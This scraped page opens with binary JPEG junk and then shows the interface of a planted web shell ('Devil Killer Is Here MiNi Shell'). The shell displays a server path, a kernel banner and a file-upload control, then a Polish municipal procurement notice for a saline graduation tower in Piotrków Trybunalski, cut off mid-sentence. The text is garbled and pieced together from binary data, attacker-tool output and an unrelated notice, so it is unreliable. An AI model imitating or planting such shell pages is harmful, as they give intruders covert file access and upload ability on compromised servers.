JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20231020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20231020/0045371201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> PIT STOP dla Aktywnych i Tężnie Trybunalskie – BO 2022. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Piotrków Trybunalski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648468</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pasaż Karola Rudowskiego 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piotrków Trybunalski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@piotrkow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.piotrkow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PIT STOP dla Aktywnych i Tężnie Trybunalskie – BO 2022. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-314ffed2-6f10-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00453712</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00035139/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.13 PIT STOP dla Aktywnych i Tężnie Trybunalskie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/832218 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Środki komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się<br/>z wykonawcami:<br/>1) Komunikacja między zamawiającym a wykonawcą w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się w języku polskim przy użyciu środków<br/>komunikacji elektronicznej za pośrednictwem Platformy znajdującej się pod adresem: https://platformazakupowa.pl/transakcja/832218<br/>Korzystanie z Platformy przez wykonawcę jest bezpłatne.<br/>2) W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy za pośrednictwem Platformy Zamawiający dopuszcza korzystanie z komunikacji elektronicznej za pośrednictwem poczty elektronicznej zamowienia.publiczne@piotrkow.pl lub skrzynki podawczej ePUAP, z zastrzeżeniem składania oferty.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej<br/>1) Wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s,<br/>b) komputer klasy PC lub MAC o konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 7,<br/>Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer<br/>minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platforma działa według standardu w komunikacji sieciowej – kodowanie UTF8,<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz<br/>dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera<br/>synchronizowanego z zegarem Głównego Urzędu Miar.<br/>2) W korespondencji wykonawca winien posługiwać się numerem sprawy określonym<br/>w IDW.<br/>3) Formaty dokumentów elektronicznych (plików):<br/>a) .doc, .docx, .rtf, .xls, .xlsx,.pdf, .jpg, .zip. – zamawiający rekomenduje stosowanie<br/>formatu .pdf. z uwagi na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą<br/>weryfikację podpisu.<br/>b) formaty m.in. .rar .gif .bmp .numbers .pages, niewystępujące w Rozporządzeniu<br/>w sprawie Krajowych Ram Interoperacyjności (…), mogą być uznane przez<br/>zamawiającego za złożone nieskutecznie.<br/>c) do kompresji danych (zalecane) zamawiający rekomenduje formaty: .zip lub .7Z<br/>– zaleca się wcześniejsze podpisanie każdego pliku.<br/>4) Rozmiar jednego pliku przesyłanego przez: Platformę – formularz do złożenia, zmiany, wycofania oferty – max. 150 MB, pozostała<br/>komunikacja max. 500 MB.<br/>b) pocztę elektroniczną lub ePUAP max. 50 MB.<br/>5) Do podpisania plików wykonawca może użyć:<br/>a) kwalifikowanego podpisu elektronicznego, wystawionego przez dostawcę<br/>kwalifikowanej usługi zaufania, będącego podmiotem świadczącym usługi<br/>certyfikacyjne4 – dla dokumentów w formacie „pdf” zamawiający zaleca podpisywanie<br/>formatem PAdES, dokumenty w formacie innym niż „pdf” zaleca podpisywać formatem<br/>XAdES zewnętrzny.<br/>W przypadku użycia podpisu zewnętrznego plik z podpisem należy przekazać łącznie<br/>z podpisywanym dokumentem. W przeciwnym razie zamawiający uzna taki dokument<br/>za niepodpisany.<br/>b) podpisu zaufanego (inaczej Profil Zaufany)<br/>– wielkość pliku nie może przekraczać 10 MB po podpisaniu dokumentu, dostępny<br/>format podpisu „xml”. Plik można podpisać na stronie:<br/>https://moj.gov.pl/nforms/signer/upload?xFormsAppName=SIGNER<br/>c) zaawansowanego podpisu elektronicznego z dowodu osobistego<br/>– informacje na stronach: https://www.gov.pl/web/e-dowod/podpis-osobisty<br/>oraz https://www.gov.pl/web/e-dowod<br/>Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować<br/>podpisy tego samego rodzaju (podpisywanie różnymi rodzajami podpisów, np. osobistym<br/>i kwalifikowanym może doprowadzić do problemów w weryfikacji plików) oraz nie<br/>wprowadzać jakichkolwiek zmian w plikach po ich podpisaniu, co mogłoby skutkować<br/>naruszeniem integralności plików.<br/>6) Data wpływu (doręczenia) dokumentów elektronicznych:<br/>a) data wczytania do Platformy oferty / wniosku o dopuszczenie, dokumentów<br/>i oświadczeń składanych wraz z ofertą po użyciu przycisku „Złóż ofertę”,<br/>b) datę wczytania do Platformy oświadczeń, zawiadomień oraz informacji po użyciu<br/>przycisku „Wyślij wiadomość do zamawiającego”,<br/>c) data otrzymania potwierdzenia od zamawiającego doręczenia mu wiadomości wysłanej<br/>pocztą elektroniczną,<br/>d) data poświadczenia wysłania dokumentu na urzędową skrzynkę na ePUAP z systemu teleinformatycznego służącego do obsługi doręczeń. Osoby uprawnione do komunikowania się z wykonawcami:<br/>Ewa Tymińska, tel. 44 732 77 96;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuje, że Administratorem danych osobowych wykonawcy jest<br/>Prezydent Miasta, Pasaż Karola Rudowskiego 10, 97-300 Piotrków Trybunalski.<br/>2. W sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z Inspektorem Ochrony Danych<br/>Osobowych – Włodzimierzem Laskiem w Urzędzie Miasta Piotrkowa Trybunalskiego, za pośrednictwem adresu e-mail:<br/>iod@piotrkow.pl, tel. 7327765.<br/>3. Dane osobowe będą przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego, archiwizacji a<br/>także celów wynikających z prawnie uzasadnionych interesów realizowanych przez administratora.<br/>4. Podstawę prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych, wydane na jej podstawie akty<br/>wykonawcze, a także ustawa o narodowym zasobie archiwalnym i archiwach.<br/>5. Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym z uwzględnieniem przepisów w zakresie<br/>zamówień publicznych, a także podmiotom przetwarzającym dane na podstawie zawartych umów.<br/>6. Pani/Pana dane osobowe mogą zostać powierzone następującym podmiotom:<br/>a. dostawcom systemów informatycznych, z którymi współpracuje Administrator, w celu utrzymania ciągłości oraz poprawności<br/>działania systemów;<br/>b. upoważnionym z mocy prawa podmiotom na udokumentowany wniosek.<br/>7. Dane osobowe wykonawcy będą przechowywane przez okres obowiązywania umowy a następnie 5 lat, albo 15 lat w przypadku<br/>zamówień współfinansowanych ze środków UE, począwszy od 1 stycznia roku kalendarzowego następującego po zakończeniu<br/>okresu obowiązywania umowy. Okresy te dotyczą również wykonawców, którzy złożyli oferty i nie zostały one uznane, jako<br/>najkorzystniejsze (nie zawarto z tymi wykonawcami umowy).<br/>8. Osobie, której dane dotyczą przysługuje prawo:<br/>1) dostępu do danych. W przypadku, gdy wykonanie obowiązku związanego z prawem dostępu do danych wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu;<br/>2) sprostowania danych, ich usunięcia oraz ograniczenia przetwarzania na warunkach określonych w przepisach Rozporządzenia<br/>Parlamentu i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE. Żądanie sprostowania danych nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym<br/>z przepisami. Żądanie sprostowania danych nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą<br/>postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z przepisami. Wystąpienie z żądaniem<br/>ograniczenia przetwarzania, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego lub konkursu;<br/>3) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.<br/>9. Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić zamawiającemu dokonanie oceny spełniania<br/>warunków udziału w postępowaniu oraz zdolności wykonawcy do należytego wykonania zamówienia, co skutkować może<br/>wykluczeniem wykonawcy z postępowania lub odrzuceniem jego oferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SPZ.271.37.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia:<br/>1) Budowa tężni solankowej wraz z instalacją elektryczną, wodociągową i technologiczną,<br/>przyłączem wodociągowym oraz obiektami małej architektury w parku ks. Kard.<br/>Wyszyńskiego w Piotrkowie Trybunalskim w ramach zadania &#34;Pit Stop dla Aktywnych<br/>i Tężnie Trybunalskie - zadanie w ramach budżetu obywatelskiego&#34;<br/> Zakres branży architektoniczno-budowlanej: wykonanie nawierzchni utwardzonych,<br/>budowa tężni solankowej z altaną o charakterze wiaty, wykonanie i montaż elementów<br/>małej architektury (ławki, kosze na śmieci, tablice informacyjne, stojaki rowerowe).<br/> Zakres branży wod. – kan. instalacyjnej: budowę przyłącza wodociągowego, budowę<br/>instalacji zewnętrznych wod-kan., budowa technologii tężni solankowej.<br/> Zakres branży elektrycznej: obejmuje budowę kablowej zalicznikowej instalacji<br/>zasilania szafki sterowania oświetleniem i tężnią, system monitoringu (kamery z szafą<br/>monitoringu) oraz kanalizację kablową RHDPE.<br/>2) Dodatkowe wymagania:<br/> Wykonawca zapewni nieodpłatny serwis gwarancyjny w okresie gwarancji oraz<br/>nieodpłatne obowiązkowe przeglądy techniczne przedmiotu umowy zapewniające<br/>bezusterkową jego eksploatację w okresie udzielonej gwarancji. Wykonawca zapewni w okresie udzielonej gwarancji nieodpłatną konserwację<br/>elementów drewnianych, elementów małej architektury i urządzeń zgodnie<br/>z zaleceniami dostawcy: konstrukcji, wyposażenia lub urządzeń.<br/> Wykonawca zakupi i dostarczy, na własny koszt, solankę oraz wykona rozruch<br/>instalacji,<br/> W dniu zgłoszenia gotowości do odbioru końcowego, wykonawca ma obowiązek<br/>przekazania zamawiającemu kompletu dokumentów odbiorowych.<br/> Zapewnienie pełnej obsługi geodezyjnej z inwentaryzacją powykonawczą włącznie.<br/> Treść tablicy z regulaminem wykonawca uzgodni z użytkownikiem.<br/> Przeprowadzenie niezbędnych badań wynikających z przepisów i prawa budowlanego.<br/> Wykonawca będzie odpowiadać za wszelkie spowodowane przez jego działania<br/>uszkodzenia instalacji na powierzchni ziemi i urządzeń podziemnych wykazanych w<br/>dokumentach przekazanych mu przez zamawiającego.<br/> Wykonawca w czasie trwania rękojmi na własny koszt dokona raz w roku przeglądu<br/>wykonanej inwestycji, z powiadomieniem odpowiednich instytucji, a następnie protokół<br/>z przeglądu dostarczy Zamawiającemu. W przypadku stwierdzenia wad, Wykonawca<br/>będzie zobowiązany do niezwłocznego przestąpienia do ich usunięcia i czas naprawy<br/>nie powinien przekroczyć 14 dni od wykonania przeglądu. Po usunięciu należy<br/>ponownie wykonać przegląd i dostarczyć go do Zamawiającego.<br/> Na trzy tygodnie przed upływem terminu udzielonej rękojmi Wykonawca, na własny<br/>koszt dokona przeglądu końcowego, z powiadomieniem odpowiednich instytucji, w tym<br/>Zamawiającego. Po jego zakończeniu Wykonawca niezwłocznie dostarczy<br/>Zamawiającemu protokół z przeglądu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44232000-5 - Drewniane konstrukcje dachowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">42113110-8 - Płyty fundamentowe</p> <p class="mb-0">44130000-0 - Studzienki kanalizacyjne</p> <p class="mb-0">44163112-8 - Układ kanalizacyjny</p> <p class="mb-0">39370000-6 - Instalacje wodne</p> <p class="mb-0">31527200-8 - Oświetlenie zewnętrzne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi (w pełnych latach)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają określone przez<br/>zamawiającego warunki udziału w postępowaniu.<br/>2. Nazwa i opis warunków udziału w postępowaniu:<br/>1) zdolność do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>1) sytuacja ekonomiczna lub finansowa:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) zdolność techniczna lub zawodowa:<br/>1. dotycząca doświadczenia wykonawcy:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 latach przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie, wykonał należycie co najmniej jedną robotę polegającą na budowie<br/>lub przebudowie, lub remoncie obiektów małej architektury o wartości minimum<br/>200 000 zł brutto.<br/>Zamawiający zastrzega, że w sytuacji gdy wykonawca polega na doświadczeniu grupy<br/>wykonawców, której był członkiem, doświadczenie to oceniane będzie na podstawie<br/>konkretnego zakresu udziału tego wykonawcy, a więc jego faktycznego wkładu<br/>w prowadzenie działań, które były wymagane od tej grupy w ramach danego<br/>zamówienia publicznego.<br/>2. dotycząca osób skierowanych przez wykonawcę do realizacji zamówienia:<br/>Wykonawca spełni warunek, jeżeli dysponuje i skieruje do realizacji następujące osoby:<br/>1) Kierownika budowy, posiadającego:<br/> uprawnienia do pełnienia samodzielnej funkcji technicznej do kierowania<br/>robotami w specjalności konstrukcyjno – budowlanej,<br/> doświadczenie – pełnienie roli kierownika budowy przy realizacji co najmniej<br/>jednej inwestycji polegającej na budowie, przebudowie, remoncie tężni<br/>solankowej uzyskane w ostatnich trzech latach liczonych od od dnia<br/>składania/otwarcia ofert.<br/>Ww. osoba/y powinna/y posiadać uprawnienia budowlane zgodnie z ustawą<br/>z dnia 7 lipca 1994 r. Prawo budowlane oraz rozporządzeniem Ministra Inwestycji<br/>i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do<br/>wykonywania samodzielnych funkcji technicznych w budownictwie lub odpowiadające<br/>im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów.<br/>W przypadku dysponowania osobami będącymi obywatelami państw członkowskich<br/>Unii Europejskiej, Konfederacji Szwajcarskiej oraz państwa członkowskiego<br/>Europejskiego Porozumieniu o wolnym Handlu (EFTA) – strony umowy o Europejskim<br/>Obszarze Gospodarczym, kwestie uprawnień należy rozpatrywać z uwzględnieniem<br/>art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz ustawy z dnia 15 grudnia<br/>2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa<br/>oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich UE.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych<br/>lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać<br/>na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. <br/> Wykonawca może w celu potwierdzenia spełniania warunków udziału w polegać<br/>na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby,<br/>niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych:<br/>1) w odniesieniu do warunków dotyczących doświadczenia, 